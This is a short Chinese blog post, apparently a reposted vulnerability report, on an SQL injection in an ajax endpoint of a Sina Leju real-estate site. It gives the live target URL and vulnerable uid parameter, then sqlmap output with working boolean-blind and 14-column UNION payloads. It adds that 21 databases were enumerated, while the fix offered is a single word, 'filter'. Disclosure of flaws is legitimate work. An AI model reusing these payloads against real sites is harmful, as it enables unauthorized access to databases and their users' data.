ajax漏洞 sql注入,新浪乐居某接口SQL注入漏洞网站安全分享!

新浪乐居某接口SQL注入漏洞url:

http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628

uid处存在注入payload:

sqlmap resumed the following injection point(s) from stored session:

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628 AND 7795=7795

Type: UNION query

Title: Generic UNION query (NULL) – 14 columns

Payload: http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=-7870 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7a71,0x6f7144787564564c774166636561577a69695971786e6d547a735a78707451435079596e4f6b666f,0x717a6a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– –

21库

表好多

解决方案:

过虑

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值